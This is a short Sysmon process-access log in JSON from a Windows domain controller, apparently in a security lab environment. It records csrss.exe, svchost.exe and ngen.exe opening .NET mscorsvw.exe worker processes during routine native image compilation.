{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.184\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010F1CA0C00}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.184","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010F1CA0C00}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.184\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010F1CA0C00}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.184","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010F1CA0C00}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.247\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001077CE0C00}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.247","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001077CE0C00}","TargetProcessId":"4868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.247\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001077CE0C00}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.247","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001077CE0C00}","TargetProcessId":"4868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.247\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001077CE0C00}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.247","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001077CE0C00}","TargetProcessId":"4868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.295\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00106BD20C00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.295","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00106BD20C00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.295\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00106BD20C00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.295","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00106BD20C00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.295\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00106BD20C00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.295","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00106BD20C00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
